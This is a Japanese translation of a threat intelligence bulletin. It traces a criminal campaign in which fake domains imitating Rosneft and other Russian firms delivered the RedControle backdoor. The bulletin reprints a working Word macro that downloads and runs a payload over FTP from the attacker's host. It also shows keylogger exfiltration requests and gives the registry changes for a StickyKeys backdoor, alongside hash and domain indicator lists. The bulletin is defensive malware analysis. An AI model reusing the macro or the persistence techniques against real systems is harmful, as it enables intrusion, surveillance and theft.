熊をつつく:ロシアの主要インフラストラクチャを狙った3年にも及ぶキャンペーン

By Cylance Threat Intelligence Bulletin

本ブログ記事は、2018年12月11日に米国で公開された抄訳版です。原文はこちらからご覧頂けます。

国家同士の争いは多くの政策議論に影響を及ぼしていますが、サイバーセキュリティに関する戦略的な考え方にも大きな影響を与えています。地政学的に重要なイベントがニュースとして報じられると、研究者達はその全体像を把握するために、国家の支援を受けた脅威アクターがスパイ活動、破壊活動、弾圧、情報操作などのサイバー活動を秘密裏に行っている兆候を探そうとします。つまり、あらゆるニュースの裏側にはサイバーキャンペーンが潜んでいる可能性があるのです。

しかし、通常の犯罪者も新聞を読んでおり、研究者達の議論に含まれるバイアスに目を光らせています。そうしたバイアスを利用することによって、さらなるカムフラージュを行ったり、新たな不可視性のレイヤーが貼られ、脅威アクターの検出はいっそう困難になります。

この脅威インテリジェンス速報では、外見上はロシア国営の石油企業をターゲットにした攻撃です。しかし、調査を実施する過程で、国家によって支援されたキャンペーンではなく、ありふれた犯罪の動機である金銭を目的とした大胆な活動であることが明らかになる様子を紹介します。

背景情報

ロスネフチ社は、自社のことを株式が公開された世界最大の石油企業と述べています。しかし、ニューヨークタイムズの最近の分析によると、同社はロシア政府の外交政策のツールであることは明白です。同社の株式の半分以上はモスクワによって所有されており、ロシアや他の近隣国家にとっては主要インフラストラクチャの大きな柱の1つとして機能しています。

したがって、同社の株式の約20%の売却が発表されたとき、世界中の報道機関が注目しました(この取引は100億ドルを超えると報道されています)。

この取引はすぐに国際政治の関心の的になりました。購入者は誰か、なぜ売却したのか、取引を仲介したのは誰か、などが取り沙汰されました。この取引が悪名高い「スティール文書」で大きく言及されていたことから、さまざまな事実が明らかになっていきました。

メディアのレポーター、ビジネスリーダー、国際関係を監視する人々もロスネフチに対して詮索の目を向けるようになりました。その理由の一端として、この取引には遅延や破談の可能性があると報道されたことや、カタールの元外交官で現在は政府系ファンドのリーダーの地位にある人物などが関与していると報道されたことが挙げられます。

重要なインフラストラクチャであること、民営化で巨額の金銭が動くこと、国内政治や国際政治における重要性など、ロスネフチに関して過去数年の間に知られているすべてのことが、外国によるスパイ活動のターゲットとなる有力で正当な理由となりました。

実際、サイランスの調査で最初に「ロスネフチ」の名前が浮上したとき、我々が探しているものが見つかったと考えました。我々は、国家による、または国家が支援する組織によるスパイ活動について調査していたのです。

しかし、その最初の印象は誤りであることがすぐに判明しました。

脅威の進化

2017年7月、サイランスは興味深いマクロが埋め込まれているWordドキュメントを見つけました。このドキュメントは、ロシア語を使用するユーザーを対象とした、よくあるマルウェアリポジトリで見つけたものです。また、2018年の初めにも同じタイプのドキュメントが再び出現したのを観測しました。そこで、このドキュメントを詳しく調べることにしました。

詳しい調査の結果、このマルウェアの作者は非常に注意深くコマンドアンドコントロール(C2)ドメインを使用していることが判明しました。そのドメインは、ロシアの石油ガス業界の実際の企業のドメイン、特にロスネフチやその子会社のドメインを非常に巧みに偽装していました。

さらに調査を進めると、この脅威アクターは、ロシアの主要な金融取引所に加えて、国家が大半を所有する石油、ガス、化学、農業、およびその他の主要インフラストラクチャの組織に偽装した、20を超える同様のサイトを作成していました。

サイランスが最初に見つけたロスネフチ関連のサイトは、「rnp-rosneft[.]ru」でした。これは、本物のウェブページである「mp-rosneft[.]ru」に似せて作成されていました。このドメインに対する言及としてサイランスが特定できたことは、電子メールアドレス「sec_hotline@mp-rosneft[.]ru」だけです。このアドレスは、企業詐欺、汚職、横領を極秘に報告するためにロスネフチが使用しているものでした。

マルウェアを少し調べてみると、この作者は、ターゲットは変更されているものの、それ以外の使用されている実際のマルウェアにはほとんど変更を加えずに、3年以上にわたってそのマルウェアを使用していることが判明しました。興味深いことに、この脅威アクターがゲームコミュニティ(具体的にはSteamのユーザー)をターゲットにしていることを示す証拠が見つかりました。後に、このターゲットの金銭的なメリットは急速に高まっていくことになります。

技術的分析
フィッシングドキュメントの分析

 

サイランスの研究者達は、ターゲットに悪意のあるコードを送り込むためにMicrosoft Officeのマクロを使用するいくつかのフィッシングドキュメントを特定しました。これらのドキュメントが個別のグループを特にターゲットにしているのか、それとも旧式のばらまき型の方法を使用してより大きな網をかけているのかは完全には明らかになっていません。その中の1つを見てみましょう。

SHA256: 7bb9f72436bcbb5fcb190ebc2cce77e1ea41ba0e6614bf2347b4514e7d65da4a
ファイル名: На ознакомление.doc ~ For Review.doc

Sub AutoOpen()
'
' AutoOpen [redacted]
'
'
Dim fso, tf
Dim St As String
Dim LocalFile As String
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set objShell = CreateObject("WScript.shell")
  LocalFile = Environ("APPDATA") & "\1.cmd"
  St = "cd %APPDATA%" & vbNewLine
  St = St + "echo open rnp-rosneft.ru>>1.txt" & vbNewLine
  St = St + "echo admin_root>>1.txt" & vbNewLine
  St = St + "echo [redacted]>>1.txt" & vbNewLine
  St = St + "echo cd /public_html/>>1.txt" & vbNewLine
  St = St + "echo binary>>1.txt" & vbNewLine
  St = St + "echo get module.exe module.exe>>1.txt" & vbNewLine
  St = St + "echo bye>>1.txt" & vbNewLine
  St = St + "ftp.exe -s:1.txt & start module.exe & del /f 1.txt & del /f 1.cmd"

  Set tf = fso.CreateTextFile(LocalFile, True)
  tf.Write (St)
  tf.Close

  If fso.FileExists(LocalFile) = True Then
   Selection.WholeStory
   Selection.Delete Unit:=wdCharacter, Count:=1
   objShell.Run "cmd /K cd %APPDATA% & 1.cmd", 0
   Selection.TypeText Text:="????????? ??????" + "???"

    End If

End Sub

図1:フィッシングドキュメントのマクロの内容

おおまかに言うと、このマクロは%APPDATA%内の“1.txt”という名前のテキストファイルにいくつかのFTPコマンドを書き出します。最後のコマンドが実行されると、“rnp-rosneft[.]ru”にホストされているFTPサーバーにログインし、そこからファイルをダウンロードして“module.exe”として保存します。その後、“module.exe”のバイナリの実行を開始し、“1.cmd”という名前の別のファイルを削除します。バイナリ“module.exe”は、ESETによって“RedControle”と名付けられたマルウェアファミリーの現代的な亜種です。サイランスは、同じような動作を行う他のいくつかのフィッシングドキュメントを特定しており、付録にそれらの一覧を記載しています。

マルウェアの分析

サイランスは、rnp-rosneft.ruドメインに接続するフィッシングの試みに関連した最近のいくつかのサンプル、および2017年7月からtrstorg[.]ruに結びついているいくつかの古いサンプルを復元することができました。収集した情報によると、“trstorg[.]ru”は最初は“TechnoSnabTorg”という名前のロシアの企業のウェブサイトでした。同社はドリルや道路建設機械のスペアパーツを販売しており、キャタピラー、コマツ、ボルボ、フィアット、日立の機械のパーツ提供を専門にしていました。

このサンプルが最初にオンラインウイルススキャナーに送付されたのは2017年7月のことであり、その時点でこのサンプルを検出していたのはわずか13社だけでした。

2017年のRedControleサンプルのSHA256:
736aa303b35ee23204e0e7d48cb31f77605234609c2b3d89a054b7c3ec2c0544

ファイル名:
Актуальный ПРАЙС10.07.2017.exe, ApMsgFwd.exe, SetLogin1Connect.exe

バックドアはDelphiでプログラミングされており、HTTPを通じて2つのコマンドアンドコントロール(C2)サーバーと通信を行っていました。このバックドアは最初の通信でIPアドレス、ホスト名、接続されているドライブに関する情報を送信します。

最初に、IPアドレス“91.211.245[.]246”のTCPポート80に対して直接通信を試み、次に“83.166.242[.]15”のTCPポート17425への通信を試みます。被害者がコンピューターを操作すると、キーストロークデータ、クリップボードデータ、ウィンドウ名がほぼリアルタイムでHTTPを通じて91.211.245[.]246宛てにクリアテキストで送信されます。

これらの情報は、SetWindowsHookExA APIを利用したよく知られた方法で収集されます。別のC2サーバー“83.166.245[.]15”からコマンドを受信します。それらはクリアテキストのように見えます。ただし、このバックドアはDelphi Indyライブラリを使用してSSLによって通信する機能も備えています。

GET /buffer.php?buffer=---------------------------------------------------------------------
%0D%0AIDA+-
+C%3A%5CDocuments+and+Settings%5CAdministrator%5CDesktop%5Ctst%5CApMs
gFwd.exe%0D%0A---------------------------------------------------------------------
%0D%0A17425%0D%0A---------------------------------------------------------------------%0D%0A
HTTP/1.1
Host: 91.211.245.246
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
GET /key.php?key=---------------------------------------------------------------------
%0D%0AC%3A%5CWINDOWS%5Csystem32%5Ccmd.exe+-+FakeNet.exe%0D%0A--
-------------------------------------------------------------------%0D%0Ahelp%0D%0A%0D%0A-----
----------------------------------------------------------------%0D%0A HTTP/1.1
Host: 91.211.245.246
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

図2:キーストロークやウィンドウのデータを送信するTCP HTTPリクエストの例

このバックドアは、感染したユーザーのレジストリハイブのRunキーを使用するという使い古された手法によって自分自身をインストールします。

“HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ApMsgFwd.exe”.

このバックドアは、ファイルのアップロードとダウンロードを行う機能、ファイルやフォルダーを操作する機能、ZLIBを使用してファイルの圧縮と圧縮解除を行う機能、ドライブ情報やホスト情報を列挙する機能、特権昇格の機能、スクリーンショットやウェブカメラの画像を取得する機能、ユーザーの入力をブロックしたりシミュレートしたりする機能、キーストロークを記録する機能、感染したシステムのプロセスを操作する機能を持っています。

C2からの指示は、コマンド“ST_A_RT_FI_LE”のように、文字“_”によってランダムに分割されています。これはHIDSやNIDSのシグネチャを回避するための試みです。

RedControleのより新しいバージョンでは、同じ文字“_”で分割されランダム化された文字列を使用して、シグネチャベースの分析やリバースエンジニアリングをさらに妨害しようとしています。サイランスの研究者が分析したサンプルでは、初期接続に次のような内容が含まれていました。


青の文字列はC2サーバーが送信したものです。赤の文字列は被害を受けたコンピューターが初期チェックインとして送信したものであり、IPアドレスと被害者の一意の識別子が含まれています。このバックドアは一連のスレッドを使用して動作します。これは、バックドアのさまざまな機能を自律的なスレッドにセグメント化するように設計されており、事前定義されたDelphiベースのさまざまなタイマーに基づいて実行されます。

このバックドアはさまざまな作者のコードの寄せ集めのように見えます。キーロガーの部分にはポルトガル語の文字列が含まれており、プロセス操作に関連する他の機能にはスラブ言語の文字列に対する参照が含まれています。後のバージョンでは、これらの文字列は最終的に削除されたか、または難読化されました。

ドロッパー:

サイランスは実行可能なドロッパーを特定しました:

b65125ee14f2bf12a58f67c623943658dd457e5b40b354da0975d7615fe9d932

このドロッパーは、被害者の候補となる人にホリデープレゼントの素敵な写真を見せながら、システムにRedControleの一種と他の興味深いバイナリを埋め込みます。このドロッパー自体はそれほど興味深いものではありませんが、StickyKeysのバックドアがシステムに埋め込まれるため、さらなる分析が必要になりました。

ドロッパーのSHA256ハッシュ:
b65125ee14f2bf12a58f67c623943658dd457e5b40b354da0975d7615fe9d932

関連するRedControleのSHA256:
8f7cf81d8bfb3780b48693020a18071a9fd382d06b0b7932226b4d583b03c3af

関連するStickyKeysのSHA256:
6e476a2ef02986a13274fb2a126ed60a1ede252919d6993de03622aaa7fe6228

このドロッパーは、フォルダー“%ALLUSERSPROFILE%\Documents”に“svhost.exe”と“system.exe”という2つの実行可能ファイルを作成し、それらの実行可能ファイルの永続化を維持するために2つの関連するRunキーを作成しました。プログラム“svhost.exe”は前述のRedControleの一種で、ドメイン“trstorg[.]ru”とIPアドレス“83.166.243[.]48”に対してネットワークコールバックを行います。

ファイル“system.exe”は、Delphiで記述されたStickyKeysバックドアプログラムです。このプログラムは最初にWindowsファイアウォールにTCPポート3389を開けて、次のレジストリキーを設定します。

  • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger -> C:\WINDOWS\system32\taskmgr.exe
  • HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections -> null value

このファイルは主に、ターゲットシステム上でRDPを可能にする役割と、正当な“taskmgr.exe”バイナリを指し示すためにStickyKeysによるハイジャックを実行する役割を担います。

StickyKeysのことをよく知らない読者のために説明すると、元々これは、2つ以上のキーを同時に押すことが困難な人のために設計された機能です。Windowsでは、Shiftキーをすばやく5回押すとStickyKeysが有効になります。上記のレジストリキーは、タスクマネージャーのバイナリ“taskmgr.exe”と目的のStickyKeysバイナリを同時に起動します。StickyKeysバックドアは次に、“google.ru”やさまざまなサブドメインとの通信をテストします。このテストに成功すると、“trstorg[.]ru”のTCPポート80に対して次のHTTPリクエストを行います。

GET /bas.php HTTP/1.1
User-Agent: DMFR
Host: trstorg.ru
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Jan 2017 17:18:48 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=60
X-Powered-By: PHP/5.5.9-1ubuntu4.

図3:StickyKeysバックドアによるリクエストとサーバーからのレスポンスの例

このサンプルは現在は動作しません。IPアドレス“80.254.96[.]251”は別の部分に再割り当てされ、ウェブサーバーとしては機能していないように見えます。

オープンソースインテリジェンスの分析

RedControleバックドアは頻繁に独自のミューテックスを作成します。

“AppFilQsSSSwwww_jadknskjnd_jadknskjnd”

これは、オープンソースインテリジェンスを通じて、上記のサンプルを次のハッシュに直接リンクします。

10c5bf2733b7147c3663baa597b2e960069edcadf794d1ec299dfcbab489dfe1
11e8692a2d2995b105591c42fcd7a0427223f2a6b16f8e6614820024cb3415f4
27614102c5386333ecd43bb086752397726783f4d1e7fe0c1735686b5199a623
4f6de2c6d6c80b459f0bdb88cf2ce22e44ad4f3045909cbd8c1fb7632956fb63
51bc34307923d83b795319877924c9ed926366758d4662c36dce58f3a1ae20bb
7a7a139b55cd5ddcbcb8f91be1d2a247d42243d2d4a595252851987075a4338d
93b2e268ca5b8fede64edc0da7195adebbe8fa490de96b5eec1489b7868710f3
a077c085dccb900ddab2542b4b332f7c43b3674c71d5cd11afdd2861b6fec2b8
c8ca5e80d3f14102fd81b0fda54120d6ce9519a72b9d3aca23cf9b5cc8c93549

これらのサンプルのいくつかは、ドメイン“sxe-csgo[.]net”および“h84622.s05.test-hf[.]su”と通信します。

これらのドメインは、主に2つのIPアドレス(“91.227.16[.]115”と“91.227.16[.]6”)、および数百もの一意のファイルハッシュにつながります。

2015年と2016年には、“sxe-csgo[.]net”はIPアドレス“109.68.190[.]244”と“46.38.50[.]106”に解決されていました。サイランスは、このアクティビティのサブセットが、ロシアのSteamコミュニティおよびCounterstrikeとCS:Goのコミュニティをターゲットにしたアクティビティに確実に結びついていると判断しています。この件については、こちらこちらこちらで説明されています。

インフラストラクチャの分析

この脅威アクターは長い期間の中でインフラストラクチャの一端を表面にさらしており、サイランスは、マルウェアによって利用されているサーバーサイドスクリプトの一部を収集できました。これらのスクリプトは、意図した被害者から取得したデータのトラッキングと記録を行うためのものです。また、攻撃者はCloudflareを利用して無料のSSL証明書を大量に取得しており、これによっていくつかのドメインがうかつにも公開されています。

攻撃者は本物のドメインを偽装するのに多くの時間と労力をつぎ込んでおり、長い期間の中でターゲットを頻繁に変えています。また彼らは、本物のドメインの有効期間が終了した後にそのドメインを登録することも時々行っています。

この脅威アクターはリトアニアのプロバイダーの“vpsnet[.]lt”に大きく依存しており、これは仮想プライベートサーバー(VPS)1台、1か月あたりのコストのオーバーヘッドが数ユーロ低くなる結果をもたらしています。

結論

この脅威アクターが20以上のウェブサイトを使用して実際のロシアの主要インフラストラクチャ企業を偽装していることを最初に発見したとき、私達は大きな関心を持ちました。それらのドメインを立ち上げるのに必要な労力は、単にそれらをコマンドアンドコントロールのためのインフラストラクチャとして使用するメリットに比べると、割に合わないように思われました。

その後、2017年4月に発行されたロシア版のフォーブスに、次のタイトルの有料の寄稿記事が掲載されました(タイトルはGoogle翻訳を使用して翻訳)。クローンの攻撃:計画がロスネフチや他の大企業の偽のサイトとどのように連携するか。

この記事の著者であるIlya Sachov氏は、情報セキュリティ企業Group-IBの創業者兼CEOであり、ロシアの国家院および外務省に属する専門家委員会のメンバーであると自称しています。

この記事では、精巧な犯罪スキームに関するGroup-IBの未公開の研究結果が述べられていると思われます。このスキームにおいて、脅威アクターは認証情報を入手して詐欺を持続的に行うために、ロシアの主要インフラストラクチャ企業(ロスネフチはその中で最も有力な企業)をほぼそっくり偽装しています。

Sachov氏はこの記事の中で、これらの偽サイトがオリジナルにどれだけ精巧に似せてデザインされているかを示すために、それらの偽サイトのスクリーンショットを多数掲載しています。

この記事ではいくつかの企業名やウェブサイトの名前について言及されており、Group-IBはそれらが詐欺キャンペーンの一部であると述べています。この記事の中で、影響を受けている企業の少なくとも1つがGroup-IBのクライアントであると説明されています。

その企業のドメインと、Group-IBによって言及されている他のほぼすべてのドメインは、サイランスの調査でも見つかっていたものです。たとえば、ロスネフチだけでなく、Mendeleevkazot、HCSDS、EuroChemなどが見つかっています。Mendeleevkazotは化学肥料メーカーで、ロシアのより大きな主要インフラストラクチャの持株会社の一部です。HCSDSはSiberian Business Unionの省略形であり、ロシアのいくつかの主要インフラストラクチャ企業で構成される持株会社です。EuroChem(おそらくGroup-IBのクライアントでしょう)は、スイスに拠点を置く化学肥料の会社であり、ロシアでは鉱業が主要な活動となっています。EuroChemの名前はいくつかのニュース関連の検索で見つかり、大規模な金融取引や地政学的な工作活動に関与していることが示されています。

これらの判明した点の中で重なる部分と、過去のゲームコミュニティをターゲットにした犯罪キャンペーンとの直接的なつながりを考えると、我々は同じオペレーションを観察していることが明らかです。これは、国家のスパイ活動ではなく、犯罪オペレーションです。

よく組織された犯罪活動と国家による活動の境界線はあいまいであることがしばしばあります。しかし、脅威インテリジェンスの専門家と利用者は自らの内側にあるバイアスに注意する必要があります。この速報で示したように、一見すると国家による不正行為であると思われていたことが、実際にはそうではなく、犯罪者はこの思い込みを利用して人々の考え方をハッキングし、その上で組織をハッキングするかもしれないのです。

付録

フィッシングドキュメントのハッシュ:

7bb9f72436bcbb5fcb190ebc2cce77e1ea41ba0e6614bf2347b4514e7d65da4a
cb1cb113de38ae4ea1312d133d485769ecb38f2a9306f497788cd8fbb6fc4707
dcec00c780cb71b955e32231d5340e90e51c3c1828262ec7cfa239e431accf5b
68ab10ca4f823d0246822f102c412430e0a57e2026b3f0a1fd97f200e9e0e707

RedControleのハッシュ:

1847f578bb25fc980f8dd4112e746df0e60531012083ffbd1f294d9b19f01e26
c12e50e7c9162d8c690d3474400fe2f5d0a9c2903adbd2837d3a9023ba86fb79
9949d5d1adb4a44463363c04678dbff0d45aeff740c754aff0c3d7b54d26016d
0556aca3b5f3a4797ca36150a4b1423ec42a6827749599395d35e369f6df5568
302866c5209e8f0b0b78bbc3411e38777de9ca59a8e1c6fa0ffdf7e35aecb2aa
63d8f1566b5d0fa6459a89a0d48a163b8a356bdf2c0bec4c648b253bd8f36bb9
8f7cf81d8bfb3780b48693020a18071a9fd382d06b0b7932226b4d583b03c3af
9949d5d1adb4a44463363c04678dbff0d45aeff740c754aff0c3d7b54d26016d
aa8dc9ad33ffb69b19d2d685e302888eb557a0159c15689c0eb36b6e649c4f3a
c0b090eca76ccff3b8e7da9a3d94418d0102277a40b1dadf7fd9096ddd668e79
d31ee9ca7eb1d0fce0f688938269c7200c982f0f13daa9d40a4ce0824de6cc18

StickyKeysのハッシュ:

6e476a2ef02986a13274fb2a126ed60a1ede252919d6993de03622aaa7fe6228

ドロッパーのハッシュ:

b65125ee14f2bf12a58f67c623943658dd457e5b40b354da0975d7615fe9d932

C2とフィッシングのドメイン:

10-sendmail[.]ru
3-sendmail[.]ru
a-nhk[.]ru
acron[.]ru[.]com
agrarnik-ooo[.]ru
agrocentrer-eurohem[.]ru
agroudo[.]ru
amonni[.]ru
audemar-piguet[.]ru
autch-mail[.]ru
azot-n[.]ru
azot-sds[.]ru
azotsds[.]ru
azs-gazpromneft[.]ru
balecsm[.]ru
barsintez[.]ru
bashneft-centralasia[.]ru
bashneft[.]su
berkovetc[.]ru
bitmain[.]org[.]ru
bitum-gazpromneft[.]ru
bitum-rosneft[.]ru
bitum-samara[.]ru
bitumen-rosneft[.]ru
bitumnpk[.]ru
bor-silicat[.]ru
box5[.]photosfromcessna[.]com
bulgarsyntezi[.]ru
bunker-rosneft[.]ru
card-rn[.]ru
cargill[.]com[.]ru
center-nic[.]ru
chem-torg[.]ru
chemcourier[.]ru
chickenpaws[.]ru
china-technika[.]ru
combisapsan[.]ru
contacts[.]rosneft-opt[.]su
cryptoman[.]org[.]ru
cuban-phosagro[.]ru
dc-02ec0b5f-mail[.]mail-autch[.]ru
dc-0649e3d7-mail[.]mp-star[.]ru
dc-45e81045-mail[.]cibur[.]ru
dc-99de0f72f24b[.]3-sendmail[.]ru
dv-china[.]ru
electronrg[.]ru
euro-bitum[.]ru
euro-chimgroup[.]ru
eurochem-nevinnomissk[.]ru
eurochem-novomoskovsk[.]ru
eurochem-novomoskovsk[.]ru[.]com
eurochem-orel[.]ru
eurochem-trading[.]com
eurochem-trading[.]ru
eurochemnovomoskovsk[.]ru
eurochim[.]ru[.]com
eurohem-novomokcovsk[.]ru
eurohem[.]ru
eurohemgroup[.]ru
exp[.]gazpromlpj[.]ru
expert-cabel[.]ru
farr-post[.]ru
fesagro[.]ru
flatglas[.]ru
frigat-m[.]ru
g-pntrade[.]ru
gazprom-bitumen[.]ru
gazprom-centralasia[.]ru
gazprom-international[.]su
gazpromlpg[.]com
gazpromlpj[.]ru
gazpromlpq[.]ru
gazpromneft-aero[.]ru
gispnd[.]ru
gpn-salavat[.]ru
hcsds-azot[.]ru
imap[.]mrggazprom[.]ru
inter-finans[.]ru
inter-lens[.]ru
john-dir[.]ru
kartll[.]ru
kolomna-profil[.]ru
kub-oil[.]ru
kuban-phosagro[.]ru
kubeliai[.]lt
kubmaslozavod[.]ru
kyazot[.]ru
kyrgyzstan-gazprom[.]ru
lpggazprom[.]ru
lubricants-rn[.]ru
lubricants-rosneft[.]com
lubricants-rosneft[.]ru
lukoil[.]com
mag-numoil[.]ru
map[.]ros-razvitie[.]ru
margcom[.]ru
masterhoste[.]ru
mazutibitum[.]ru
mc-gp[.]ru
mekstekla[.]ru
mendeleevscazot[.]ru
mendeleevsk-azot[.]ru
metalloprakat[.]ru
mir-polimer[.]ru
mnpz-gazpromneft[.]ru
mp-star[.]ru
mpt-o[.]ru
mrg-gazprom[.]ru
mrggazprom[.]ru
mta5[.]boommail[.]org
nic-center[.]ru
nknpz[.]rosneft-opt[.]su
nl-mk[.]ru
oil-gazpromneft[.]ru
omega-metal[.]ru
onlinecontract[.]su
ooo-agrarnik[.]com
ooo-tandem[.]net
opt-rosneft[.]ru
phaz[.]ru
polietileni[.]ru
poligal-vostok[.]ru
polimer-trubi[.]ru
polimer16[.]ru[.]com
pop[.]gazprom-centralasia[.]ru
pop[.]mnpz-gazpromneft[.]ru
pop[.]opt-rosneft[.]ru
pop[.]rnp-rosneft[.]ru
pop[.]ros-razvitie[.]ru
postaitaliana[.]win
prof-nastillist[.]ru
prof-zavod[.]ru
profzavod[.]net
promximiya[.]ru
prosintezi[.]ru
pushkinomill[.]ru
refas[.]rnp-rosneft[.]ru
refinery-yaroslavl[.]ru
refinery-yaroslavl[.]su
rn-cpr[.]ru
rn-lubricants[.]ru
rnp-rosneft[.]ru
roamingupdate[.]eu
ros-eurochem[.]ru
ros-metal[.]ru
ros-nefti[.]ru
ros-razvitie[.]ru
rosagrotrayd[.]ru
rosneft-centralasia[.]ru
rosneft-de[.]com
rosneft-opt[.]com
rosneft-opt[.]su
rosneft-tender[.]ru
rosneft-tender[.]su
rosneft-tuapse[.]ru
rospolimery[.]ru
rost-selmash[.]ru
rps[.]ru[.]com
ru-uralchem[.]ru
ru-uralhim[.]ru
ruproflist[.]ru
rus-agrohim[.]ru
rusagro-him[.]ru
rusagrohim[.]com
russbitum[.]ru
saharzol[.]com
sal-stek[.]ru
salavstek[.]ru
salstec[.]ru
salstek[.]com[.]ru
samp[.]real-city[.]lt
sarat-steklo[.]ru
saratovstroisteklo[.]ru
saratovstroy-steklo[.]ru
severstal[.]com[.]ru
sibur[.]com[.]ru
sibur[.]ru[.]com
siburint[.]ru
simf-khp[.]ru
smtp[.]gazpromlpj[.]ru
spectech-china[.]ru
spi-mex[.]ru
steklo-stroj[.]ru
successex[.]ru
successex24[.]ru
sx[.]perfecttool[.]net
ta-bitum[.]ru
tdbkh[.]ru
teh-mail[.]ru
tektorg-rosneft[.]ru
tender-rosneft[.]com
tender-rosneft[.]net
tender-rosneft[.]ru
tender-rosneft[.]su
tender[.]ros-nefti[.]ru
tiret-salt[.]ru
titanomsk[.]ru
tmez[.]ru
tolyatiazot[.]ru
transneft[.]su
trstorg[.]ru
tsenazabora[.]ru
tuapse-rosneft[.]ru
ufaneftehim[.]bashneft[.]su
ufaorgsintez[.]bashneft[.]su
ural-met[.]su
uralchem[.]net[.]ru
uralchemm[.]ru
uralchim[.]com
uralchim[.]com[.]ru
uralhem[.]ru
vitohim-rostov[.]ru
vmznasos[.]ru
vmzz[.]ru
vojxua[.]iheys[.]in
volga-phosagro[.]ru
vostok-polygal[.]ru
wapmafija[.]eu
world-provodnik[.]ru
wtpc[.]ru
xn----7sbiki4aifik1ax[.]xn--p1ai
xn----8sbyfdnfhp0c[.]xn--p1ai
xn----gtbcbb8bdhqbmdl1a[.]xn--p1ai
xn----gtbcbb8bdhqbmdl1a5j[.]xn--p1ai
xn--80aaoboarccvfll0ah5mza[.]xn--p1ai
xn--e1apchgin[.]xn--p1ai
xn--j1aicfcj5e[.]xn--e1apchgin[.]xn--p1ai
yandex[.]mail-autch[.]ru
yug-polimer[.]ru

 

Tags: